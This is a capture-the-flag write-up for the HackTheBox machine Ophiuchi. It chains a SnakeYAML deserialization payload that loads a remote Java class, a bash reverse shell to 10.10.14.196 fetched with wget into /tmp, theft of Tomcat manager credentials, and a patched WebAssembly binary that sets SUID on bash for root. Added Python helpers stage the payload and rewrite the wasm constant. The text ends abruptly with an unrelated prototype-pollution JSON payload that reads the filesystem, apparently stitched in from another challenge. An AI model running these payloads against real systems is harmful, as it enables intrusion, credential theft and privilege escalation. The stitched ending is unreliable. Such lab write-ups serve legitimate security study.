HackTheBox-Ophiuchi
Rustscan
rustscan -a 10.10.10.227 -- -A -sC -sV
Open 10.10.10.227:22
Open 10.10.10.227:8080
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.38
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Parse YAML
PORT 8080 (HTTP)
There is a YAML parser on the page. I tried submitting some input but got no visible response.
From the nmap scan we already know that Apache Tomcat 9.0.38 is running, so I tried logging in at /manager, but the default credentials did not work.
After googling for Apache Tomcat 9.0.38 vulnerabilities/exploits I found the SnakeYAML deserialization exploit. Note that the bug is in SnakeYAML, the YAML library the parser application uses, not in Tomcat itself.
The exploit works because SnakeYAML's default constructor lets a YAML document instantiate arbitrary Java classes through !! tags, so an attacker-supplied document can call a constructor of its choosing:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://VPN_IP/"]
]]
]
Once that document is parsed, we see a request on our machine for
/META-INF/services/javax.script.ScriptEngineFactory
because ScriptEngineManager discovers engine factories through ServiceLoader, using the URLClassLoader we handed it.
We abuse this by mirroring that layout: a directory META-INF with a subdirectory services containing a file named javax.script.ScriptEngineFactory. That file lists the fully qualified name of our class; the class loader then fetches the class and instantiates it, which runs our code in its constructor.
Create a file named exploit.java; you can take the Java code from here. To begin with we make it ping our local machine, so we can confirm the exploit works before going for a reverse shell:
https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java
Compile the Java file with javac and you get a .class file.
In javax.script.ScriptEngineFactory we put the name of that class.
We also make a folder snakeyml holding exploit.class.
The file structure then looks like this. Start a python3 web server or apache2 to host the folder and submit the same YAML document calling the ScriptEngineManager constructor.
After sending it we receive a 500 error.
The error shows that we compiled the Java file with the latest javac, producing a class-file version the target JVM does not support; we need to compile for class-file version 55, which is Java 11. javac can do this with the --release option (thanks, Stack Overflow).
Recompile with --release 11, start the python3 web server again and listen for ICMP packets on the tun0 interface.
Submitting the YAML with the constructor chain again, we see the ICMP packets arrive.
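Added example (not from the write-up or from artsploit's repository): a Python helper that builds the directory tree the URLClassLoader will request, writes the services file that names the factory class, and checks the compiled class's major version before serving it, which catches the Java 11 (class version 55) mismatch that produced the 500 above. The class name snakeyml.exploit is assumed from the folder layout described; the header-only class stub in stage_demo is constructed for the demo and is not a loadable class.

```python
# Stage the URLClassLoader/ServiceLoader tree for the SnakeYAML payload and
# sanity-check the compiled class before serving it (added example, not the
# write-up's own steps).
import os
import struct
import tempfile
import textwrap

TARGET_MAJOR = 55      # class-file major version the target JVM accepted (Java 11)
MAJOR_TO_JAVA = {52: 8, 53: 9, 54: 10, 55: 11, 56: 12, 57: 13, 58: 14, 59: 15, 60: 16, 61: 17}
SERVICE = "javax.script.ScriptEngineFactory"

def class_major_version(class_bytes):
    """Major version from the .class header: magic, minor_version, major_version."""
    if class_bytes[:4] != b"\xca\xfe\xba\xbe" or len(class_bytes) < 8:
        raise ValueError("not a Java class file")
    _minor, major = struct.unpack(">HH", class_bytes[4:8])
    return major

def release_problem(class_bytes, target_major=TARGET_MAJOR):
    """None if the class will load on the target JVM, else a message explaining
    the class-version mismatch that showed up as the 500 in the write-up."""
    major = class_major_version(class_bytes)
    if major <= target_major:
        return None
    return (f"class is version {major} (Java {MAJOR_TO_JAVA.get(major, '?')}); "
            f"recompile with: javac --release {MAJOR_TO_JAVA[target_major]} exploit.java")

def yaml_payload(base_url):
    """SnakeYAML document: ScriptEngineManager(URLClassLoader([URL(base_url)]))."""
    return textwrap.dedent(f"""\
        !!javax.script.ScriptEngineManager [
          !!java.net.URLClassLoader [[
            !!java.net.URL ["{base_url}"]
          ]]
        ]""")

def stage_payload(root, class_fqn, class_bytes):
    """Write the two files ServiceLoader fetches through the URLClassLoader:
    META-INF/services/<service> (names the factory class) and the class itself.
    Returns the request paths to expect in the web server log."""
    problem = release_problem(class_bytes)
    if problem:
        raise ValueError(problem)
    services = os.path.join(root, "META-INF", "services")
    os.makedirs(services, exist_ok=True)
    with open(os.path.join(services, SERVICE), "w") as f:
        f.write(class_fqn + "\n")
    class_rel = class_fqn.replace(".", "/") + ".class"
    class_path = os.path.join(root, *class_rel.split("/"))
    os.makedirs(os.path.dirname(class_path), exist_ok=True)
    with open(class_path, "wb") as f:
        f.write(class_bytes)
    return ["/META-INF/services/" + SERVICE, "/" + class_rel]

def stage_demo(class_fqn="snakeyml.exploit", major=55):
    """Stage into a temp dir using a constructed header-only class stub (a real
    run passes the javac output); returns (root, expected request paths)."""
    stub = b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, major)
    root = tempfile.mkdtemp(prefix="yaml-payload-")
    return root, stage_payload(root, class_fqn, stub)
```

Call stage_payload with the real exploit.class bytes, serve the returned root directory (for example with python3 -m http.server from inside it), submit yaml_payload("http://VPN_IP/") to the parser, and expect exactly the two GET requests the function returns; if the services file is fetched but the class is not, the class name in the services file does not match the package/directory layout.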
There was a problem getting a reverse shell though: no matter which one I tried, bash or netcat, I could not get a shell directly from the Java payload, so I put a bash reverse shell in a script instead:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.196/4242 0>&1
Now we download the bash script onto the target machine with wget, save it in the /tmp directory and execute it with bash, with a netcat listener waiting. So we modify exploit.java accordingly and recompile.
Enter the YAML in the parser input box.
Once you submit it, the terminal shows the request for exploit.sh and you get a reverse shell.
Stabilize the shell using python3.
Since Apache Tomcat is running we can look for its users file, tomcat-users.xml, which holds the manager credentials.
Use the find command to locate that file.
It contains a password for admin, so we can try switching to the admin user on the machine with it.
Reading the source code we see that it loads the WebAssembly binary, calls its info function and takes the return value; if that value is not equal to 1 the program prints "Not ready to deploy", otherwise it executes the deploy.sh script.
One thing to note is that main.wasm and deploy.sh are not referenced by absolute paths in the source. They are therefore resolved relative to the directory the program is run from, which lets us supply our own copies of both (the write-up also plays with the PATH variable, but the working directory is what decides which files are picked up). So first I download main.wasm to my machine.
For this we use a tool named WABT, the WebAssembly Binary Toolkit:
https://github.com/WebAssembly/wabt
We need to convert main.wasm to a .wat file, the text format of the binary. But first let's look at the info function with wasm-decompile, which decompiles the binary into a C-like syntax.
We can see that the info function returns the value 0, so that's what we need to change. Converting .wasm to .wat with wasm2wat:
Opening the .wat file we can see the const value is 0.
Remember the source had the condition f != 1 (if f is not equal to 1 it prints "Not ready to deploy", otherwise it executes the deploy.sh script), so change that 0 to 1.
Now we need it back in binary form (.wasm), so convert it from .wat to .wasm with wat2wasm.
Transfer this onto the target machine into the /tmp directory and also create a deploy.sh file there. I added a command to that script that sets the SUID bit on bash.
Now add /tmp to the PATH variable and run the Go source code as sudo from /tmp, where our main.wasm and deploy.sh are, since the program resolves them relative to its working directory.
We can see that /bin/bash now has the SUID bit set, which means we can get root by running bash with -p (the -p flag keeps the effective UID instead of dropping it).
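Added example, not the wabt workflow the write-up uses: a small Python walker over the wasm binary format that finds the function exported as info, checks that its body is the bare `i32.const N; end` that wasm2wat showed, and rewrites the constant, re-encoding the code section's LEB128 sizes so the module stays well-formed. The SAMPLE_WASM module is constructed here (it is not the box's main.wasm); the walker counts function imports so export indices map onto code bodies correctly, and refuses modules with table, memory or global imports rather than risk mis-indexing.

```python
# Minimal WebAssembly binary walker: find the exported `info` function and
# rewrite the i32.const it returns (added example, not the write-up's tooling).
WASM_HEADER = b"\x00asm\x01\x00\x00\x00"
SEC_IMPORT, SEC_EXPORT, SEC_CODE = 2, 7, 10
OP_I32_CONST, OP_END = 0x41, 0x0B

def read_leb(buf, pos, signed=False):
    """LEB128 at pos -> (value, next_pos); i32.const immediates are signed."""
    value, shift = 0, 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return (value - (1 << shift) if signed and b & 0x40 else value), pos

def write_leb(value, signed=False):
    out = bytearray()
    while True:
        b, value = value & 0x7F, value >> 7
        done = value == (-1 if signed and b & 0x40 else 0)
        out.append(b if done else b | 0x80)
        if done:
            return bytes(out)

def sections(buf):
    """Yield (id, header_pos, content_start, content_end) for every section."""
    if buf[:8] != WASM_HEADER:
        raise ValueError("not a wasm v1 module")
    pos = 8
    while pos < len(buf):
        size, start = read_leb(buf, pos + 1)
        yield buf[pos], pos, start, start + size
        pos = start + size

def imported_func_count(buf):
    """Imports take the low function indices; export indices are offset by this."""
    funcs = 0
    for sec_id, _, start, _ in sections(buf):
        if sec_id != SEC_IMPORT:
            continue
        count, pos = read_leb(buf, start)
        for _ in range(count):
            for _ in range(2):                      # module name, field name
                n, pos = read_leb(buf, pos)
                pos += n
            if buf[pos] != 0:
                raise NotImplementedError("table/memory/global import: not handled here")
            funcs, pos = funcs + 1, read_leb(buf, pos + 1)[1]   # kind byte, typeidx
    return funcs

def exported_func_index(buf, name):
    for sec_id, _, start, _ in sections(buf):
        if sec_id != SEC_EXPORT:
            continue
        count, pos = read_leb(buf, start)
        for _ in range(count):
            n, pos = read_leb(buf, pos)
            ename, pos = buf[pos:pos + n].decode(), pos + n
            kind, (idx, pos) = buf[pos], read_leb(buf, pos + 1)
            if kind == 0 and ename == name:
                return idx
    raise KeyError(f"no exported function {name!r}")

def _const_site(buf, name):
    """Locate `name`'s body and require it to be exactly `i32.const N; end`,
    the shape wasm2wat showed for info() in the write-up."""
    hdr, start, end = next((h, s, e) for i, h, s, e in sections(buf) if i == SEC_CODE)
    count, pos = read_leb(buf, start)
    bodies = []
    for _ in range(count):
        size, pos = read_leb(buf, pos)
        bodies.append(buf[pos:pos + size])
        pos += size
    target = exported_func_index(buf, name) - imported_func_count(buf)
    body = bodies[target]
    nlocals, p = read_leb(body, 0)
    for _ in range(nlocals):                        # local decls: (count, valtype)
        p = read_leb(body, p)[1] + 1
    if body[p:p + 1] != bytes([OP_I32_CONST]):
        raise ValueError(f"{name} does not start with i32.const; patch by hand")
    value, q = read_leb(body, p + 1, signed=True)
    if body[q:] != bytes([OP_END]):
        raise ValueError(f"{name} is more than a bare constant return; patch by hand")
    return hdr, end, bodies, target, body[:p], value

def const_return_value(buf, name="info"):
    return _const_site(buf, name)[-1]

def patch_const_return(buf, name="info", new_value=1):
    """Rebuild the code section so `name` returns new_value; body and section
    sizes are re-encoded, so an immediate of a different LEB length is fine."""
    hdr, end, bodies, target, locals_decl, _ = _const_site(buf, name)
    bodies[target] = locals_decl + bytes([OP_I32_CONST]) + write_leb(new_value, True) + bytes([OP_END])
    content = write_leb(len(bodies)) + b"".join(write_leb(len(b)) + b for b in bodies)
    return buf[:hdr] + bytes([SEC_CODE]) + write_leb(len(content)) + content + buf[end:]

# Constructed sample (not the box's main.wasm): func exported as "info", body `i32.const 0; end`.
SAMPLE_WASM = (WASM_HEADER
    + bytes.fromhex("01 05 01 60 00 01 7f")            # type 0: () -> i32
    + bytes.fromhex("03 02 01 00")                     # func 0 uses type 0
    + bytes.fromhex("07 08 01 04 69 6e 66 6f 00 00")   # export "info" = func 0
    + bytes.fromhex("0a 06 01 04 00 41 00 0b"))        # body: i32.const 0; end
```

Usage: `patched = patch_const_return(open("main.wasm", "rb").read())`, then write `patched` out and confirm with `const_return_value(patched) == 1`; if the function body is anything more than a single constant the walker refuses, and the wat2wasm round trip from the write-up is the safer route.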
You can also get a reverse shell using netcat (OpenBSD)
{
"song":
{
"name":"Not Polluting with the boys"
},
"__proto__.block":
{
"type": "Text",
"line": "'test'; return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "ARZ"
}
}